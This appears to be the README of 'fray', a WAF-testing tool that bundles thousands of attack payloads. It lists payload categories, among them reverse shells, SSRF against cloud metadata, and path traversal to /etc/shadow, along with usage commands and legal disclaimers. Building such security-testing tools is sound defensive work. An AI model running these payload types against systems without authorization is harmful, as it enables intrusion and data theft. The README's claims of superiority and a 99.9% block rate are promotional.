1. Only tool with 100+ CVE coverage (2020-2026) - Including Log4Shell, Spring4Shell, ProxyShell
2. POC simulation guide - Step-by-step tutorials for each CVE
3. AI-native design - First tool built for Claude Code, ChatGPT integration
4. WAF-focused - Not diluted with general security testing
5. Production-ready - Interactive CLI + Docker + comprehensive docs

🚀 Key Advantages

1. ⚡ Fast: Start testing in 30 seconds with interactive mode
2. 🎯 Focused: 2,155 payloads specifically for WAF testing (not buried in 10,000+ files)
3. 🤖 AI-Compatible: Structured JSON format works with Claude Code, ChatGPT, and other AI tools
4. 📦 Team-Ready: Docker support + documentation = easy sharing
5. 📊 Organized: 12 clear categories vs scattered files or wiki pages
6. 🎓 Educational: Built for learning, not exploitation

Perfect for: Bug bounty hunters, penetration testers, security researchers, and teams who need focused WAF testing without the complexity of enterprise tools.

See docs/ for detailed documentation.

�📁 Repository Structure

fray/
├── README.md                          # This file
├── LICENSE                            # MIT License
├── CONTRIBUTING.md                    # Contribution guidelines
├── pyproject.toml                     # PyPI package configuration
├── fray/                     # Python package
│   ├── __init__.py                   # Package init (v3.0.0)
│   ├── cli.py                        # CLI entry point
│   ├── detector.py                   # WAF detection engine
│   ├── tester.py                     # WAF testing engine
│   ├── reporter.py                   # Report generator
│   ├── recommender.py                # WAF recommendations
│   ├── payload_creator.py            # Easy payload creator
│   ├── payload_generator.py          # Payload generator
│   └── payloads/                     # 6,100+ attack payloads
│       ├── xss/                      # XSS payloads (13 files)
│       ├── sqli/                     # SQL injection
│       ├── ssrf/                     # SSRF payloads
│       ├── ai_prompt_injection/      # AI/LLM payloads
│       └── ...                       # 21 categories total
├── docs/                              # Documentation (26 guides)
├── examples/                          # Example scripts
├── tests/                             # Test suite
├── waf_detector.py                    # Legacy CLI (still works)
└── waf_tester.py                      # Legacy CLI (still works)

🚀 Quick Start

Installation

# Install from PyPI (recommended)
pip install fray

# Or clone from GitHub
git clone https://github.com/dalisecurity/fray.git
cd fray

Usage

Load Payloads

import json

# Load XSS payloads
with open('payloads/xss/basic.json', 'r') as f:
    xss_payloads = json.load(f)

for payload in xss_payloads:
    print(f"Category: {payload['category']}")
    print(f"Payload: {payload['payload']}")
    print(f"Description: {payload['description']}")

Test Against Your WAF

from tools.payload_tester import WAFTester

tester = WAFTester(target_url="https://your-target.com")
results = tester.test_payloads('payloads/xss/basic.json')
tester.generate_report(results)

📚 Payload Categories

1. Cross-Site Scripting (XSS) - 779 payloads (34.5%)

• Basic XSS (412): Standard script tags and event handlers
• SVG-based XSS (175): SVG onload, animation, namespace abuse
• 🔥 100+ Critical CVEs (2020-2026) (103): Real-world vulnerabilities
  • Log4Shell, Spring4Shell, ProxyShell, Drupalgeddon2
  • VMware vCenter, Confluence, GitLab, Pulse Secure
  • Latest 2025-2026: Next.js, React, WordPress, Laravel, Django
• 🔥 Real-World Bypasses (45): Security researcher discoveries
  • PDF XSS, SVG/Math element hiding, Pointer events, React2Shell
  • Method-based bypass, Capsaicin AI-generated, Prototype pollution
• Advanced XSS (15): ES6+, WebAssembly, Service Workers
• Event Handlers (35): Rare events (onbounce, media events)
• DOM-based XSS (24): Client-side manipulation
• Encoded XSS (12): URL, HTML entity, Unicode encoding
• Obfuscated XSS (3): Case variation, whitespace, comments
• Mutation XSS (4): Browser parsing mutations
• Polyglot XSS (1): Multi-context payloads

2. SQL Injection - 148 payloads (6.9%)

• Comprehensive SQLi (120): Union, Boolean, Time-based, Error-based, Stacked queries
• Database-specific: PostgreSQL, MySQL, MSSQL, Oracle, SQLite
• NoSQL injection: MongoDB, CouchDB
• Blind SQLi, Out-of-band exfiltration

3. Command Injection - 125 payloads (5.8%)

• Comprehensive (115): Reverse shells, Command substitution, Encoding bypass
• Shells: Bash, Netcat, Python, Perl, Ruby, PHP, PowerShell
• Time-based detection: Sleep, Ping, Timeout
• File operations: Cat, Ls, Find, Grep

4. Server-Side Request Forgery (SSRF) - 72 payloads (3.3%)

• Cloud metadata: AWS, GCP, Azure (multiple endpoints)
• Protocol smuggling: Gopher, Dict, FTP, TFTP
• DNS rebinding, IPv6, IP encoding (decimal, hex, octal)
• Port scanning: Common ports (80, 443, 8080, 3306, 6379, 27017)

5. Server-Side Template Injection (SSTI) - 62 payloads (2.9%)

• Jinja2/Flask: Config access, RCE, Sandbox escape
• Twig: Filter callback exploitation
• Freemarker: Execute utility, Classloader
• Velocity: Runtime exploitation

6. Path Traversal - 59 payloads (2.7%)

• Encoding variations: Unicode, UTF-8, Double URL encoding
• Multiple depths: 1-10 levels deep
• Target files: /etc/passwd, /etc/shadow, Windows config files
• Null byte bypass, Zip slip

7. LDAP Injection - 55 payloads (2.6%)

• Wildcard injection: *, )(uid=
• Boolean bypass: AND, OR, NOT operators
• Authentication bypass: Multiple username variations

8. XPath Injection - 54 payloads (2.5%)

• Boolean bypass: OR/AND conditions
• Function exploitation: name(), substring(), string-length()
• Data extraction: Multiple value testing

9. CRLF Injection - 54 payloads (2.5%)

• Header injection: Set-Cookie, Location, Content-Type
• Encoding variations: %0d%0a, %0a, \r\n
• Response splitting: Double CRLF for XSS

10. Open Redirect - 51 payloads (2.4%)

• Protocol variations: http://, https://, //, javascript:
• Multiple domains: evil.com, attacker.com, phishing.com
• @ symbol bypass: example.com@evil.com

11. XML External Entity (XXE) - 34 payloads (1.6%)

• File disclosure: Multiple system files
• SSRF via XXE: Internal network access
• Parameter entities: OOB data exfiltration
• PHP wrappers: Base64 encoding, Expect wrapper

12. Other/Mixed - 760 payloads (35.3%)

• Experimental payloads
• Multi-vector attacks
• Fuzzing patterns
• Edge cases

🔬 Testing Methodology

Our testing approach:

1. Systematic Coverage: 100 rounds of testing across all major attack vectors
2. Multiple Delivery Methods: GET, POST (urlencoded/JSON), multipart, HTTP/2
3. Encoding Variations: All common encoding methods tested
4. Browser Automation: Playwright-based testing for client-side execution
5. Reverse Engineering: Pattern analysis and hypothesis-driven testing

See docs/methodology.md for detailed methodology.

📊 Key Findings

WAF Effectiveness

• Detection Rate: 99.9% of malicious payloads blocked
• False Positives: Minimal (benign requests passed)
• Encoding Normalization: All encoding methods detected
• Context-Aware: Understands HTML structure and JavaScript context

Bypass Attempts

• ✗ Traditional obfuscation (case, whitespace, encoding)
• ✗ Advanced techniques (mXSS, polyglots, DOM clobbering)
• ✗ Parameter smuggling and header injection
• ✗ Browser-specific quirks and mutations
• ✗ Charset confusion and protocol variations

Result: No exploitable bypasses found, demonstrating robust WAF implementation.

🛠️ Tools

Payload Tester

Automated tool for testing payloads against WAFs:

python tools/payload_tester.py --target https://example.com --payloads payloads/xss/basic.json

Classifier

Classify and organize payloads by technique:

python tools/classifier.py --input raw_payloads.txt --output classified/

Analyzer

Analyze test results and generate reports:

python tools/analyzer.py --results results.json --output report.html

📖 Documentation

• Methodology - Detailed testing methodology
• Analysis - In-depth analysis of results
• Techniques - Bypass techniques explained
• Results - Complete test results and statistics

🤝 Contributing

We welcome contributions! Please see CONTRIBUTING.md for guidelines.

Ways to contribute:

• Add new payloads
• Improve classification
• Add testing tools
• Enhance documentation
• Report issues

⚖️ Legal Disclaimer

IMPORTANT: This repository is for educational and research purposes only.

• Only test against systems you own or have explicit permission to test
• Unauthorized testing is illegal and unethical
• The authors are not responsible for misuse of this information
• Always follow responsible disclosure practices
• Respect bug bounty program rules and scope

📜 License

MIT License - See LICENSE file for details.

🙏 Acknowledgments

• PortSwigger Web Security Academy
• OWASP Testing Guide
• Cloudflare Security Team
• Security research community
• All contributors

📞 Contact

• Issues: GitHub Issues
• Discussions: GitHub Discussions
• PyPI: pypi.org/project/fray

🔗 Related Projects

• PayloadsAllTheThings
• SecLists
• XSS Payloads
• OWASP Testing Guide

❓ Frequently Asked Questions

Is this legal to use?

Yes, but only for authorized testing. This tool is designed for:

• ✅ Systems you own
• ✅ Systems you have written permission to test
• ✅ Bug bounty programs (within scope)
• ✅ Educational and research purposes

Never use on systems without authorization. See SECURITY.md for legal guidelines.

How do I test my own WAF?

See our comprehensive docs/poc-simulation-guide.md for:

• Step-by-step CVE testing tutorials
• Interactive CLI usage examples
• Automated testing scripts
• Results interpretation

Quick start:

pip install fray
fray detect https://yoursite.com
fray test https://yoursite.com -c xss --max 10

Can I contribute payloads?

Absolutely! We welcome contributions. Please:

1. Read CONTRIBUTING.md
2. Use our payload submission template
3. Ensure payloads are safe and properly documented
4. Follow responsible disclosure for CVEs

Is this better than SecLists or PayloadsAllTheThings?

Different focus. We're WAF-specific with unique advantages:

• ✅ 103 CVE coverage (2020-2026) - they have none
• ✅ POC simulation guide - they don't have this
• ✅ Interactive CLI tool - they're just files
• ✅ AI-compatible (Claude Code, ChatGPT)
• ✅ 100% WAF-focused vs ~10-15% in general collections

See our comparison table for details.

How often is this updated?

Actively maintained. We add:

• New CVEs as they're disclosed
• Community-contributed payloads
• Latest bypass techniques
• Documentation improvements

Check CHANGELOG.md for update history.

What WAFs does this work against?

Fray detects and tests against 25 major WAF vendors including Cloudflare, AWS WAF, Azure WAF, Akamai, Imperva, F5 BIG-IP, Fastly, Google Cloud Armor, Sucuri, Fortinet FortiWeb, Wallarm, and more. See the full WAF Vendor Detection table for the complete list with detection signatures.

Results may vary by WAF vendor and configuration.

Can I use this for bug bounty hunting?

Yes! Many payloads come from successful bug bounty discoveries. However:

• ✅ Always follow program rules and scope
• ✅ Get proper authorization
• ✅ Practice responsible disclosure
• ❌ Don't test out-of-scope targets

How do I report a security issue?

Do NOT open a public issue. Instead:

• Email: soc@dalisec.io
• See SECURITY.md for our disclosure policy
• We follow a 90-day responsible disclosure timeline

Can I use this commercially?

Yes, under MIT License. You can:

• ✅ Use in commercial products
• ✅ Integrate into security tools
• ✅ Use for client assessments
• ✅ Modify and distribute

Just maintain the license and attribution.

Why are all payloads blocked?

That's the point! This demonstrates:

• ✅ WAF effectiveness (99.9% block rate)
• ✅ Comprehensive testing methodology
• ✅ What attackers try vs what works

Use this to:

• Validate your WAF is working
• Understand attack patterns
• Improve defensive measures

How do I get support?

• Questions: GitHub Discussions
• Bugs: GitHub Issues
• Security: soc@dalisec.io
• Commercial: soc@dalisec.io

📈 Roadmap

• Add more payload categories
• Implement machine learning classification
• Create web-based payload browser
• Add payload effectiveness scoring
• Integrate with popular security tools
• Add multi-WAF comparison testing

---

🏆 Contributors Wall of Fame

Special Thanks:

• Security researchers on Twitter/X: @pyn3rd, @therceman, @KN0X55, @lu3ky13
• Bug bounty community for CVE disclosures
• OWASP and PortSwigger for security research
• All contributors who submit payloads and improvements

---

Star ⭐ this repository if you find it useful!